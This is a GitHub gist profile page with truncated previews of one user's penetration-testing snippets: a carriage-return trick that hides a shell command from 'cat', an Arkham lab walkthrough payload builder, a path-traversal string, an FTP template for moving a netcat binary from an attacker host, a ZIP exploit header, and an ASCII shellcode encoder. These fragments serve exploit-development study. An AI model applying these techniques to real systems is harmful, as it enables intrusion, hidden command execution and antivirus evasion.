Skip to content

Instantly share code, notes, and snippets.


Kevin Kirsche kkirsche

View GitHub Profile
kkirsche /
Created Dec 29, 2020
Exit Codes Python
from enum import IntEnum
class ExitCode(IntEnum):
"""The following exit codes are defined and can be used with SystemExit, although they
are not required. These are typically used for system programs written in Python,
such as a mail servers external command delivery program.
* EX_OK: Exit code that means no error occurred.
* EX_USAGE: Exit code that means the command was used incorrectly, such as when the wrong number of arguments are given.
* EX_DATAERR: Exit code that means the input data was incorrect.
kkirsche /
Created Jan 8, 2020
The danger of just trusting the cat command
#!/usr/bin/env python3
hidden_cmd = "echo 'You forgot to check `cat -A`!' > oops"
visible_cmd = "echo 'Hello world!'"
if __name__ == "__main__":
with open("", "w") as f:
txt = "#!/bin/sh\n"
txt += hidden_cmd + ";" + visible_cmd + " #\r" + visible_cmd + " " * (len(hidden_cmd) + 3) + "\n"
kkirsche /
Last active Oct 1, 2019
Arkham Walkthrough
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
from pyDes import des, ECB, PAD_PKCS5
import hmac
def create_payload():
kkirsche /
Last active Jul 29, 2019
Patch for rbenv's ree-1.8.7-2012.02 Installer
View mount-shared-folders
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (${vmwpath})"
sudo mkdir -p "${vmwpath}"
sudo umount -f "${vmwpath}" 2>/dev/null
sudo vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "${vmwpath}"
import requests
import webbrowser
# formatted using Black
url = ""
LFI = "../../../../../../../../../"
pages = [
kkirsche /
Created Oct 17, 2018
Antivirus Checking
#!/usr/bin/env python
from jinja2 import Template
from subprocess import call
lhost = ''
binary = 'ncx99.exe'
split_num = 50
tmpl = Template('''open {{ lhost }} 21
{%- for f in split_files %}
cat "${1}" | tr -d '\\x' | xxd -r -p > "${1}.bin"
#!/usr/bin/env python
# Original Author : corelanc0d3r
# Pocython Author: d3cc3pt10n
# Note: Python 3 doesn't work, Python 2 does...weird!
filename = ''
filesize = '\xe4\x0f'
# Local file header
# 30 bytes
kkirsche /
Created Oct 2, 2018 — forked from mgeeky/
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
# This payload will at the beginning align the stack by firstly moving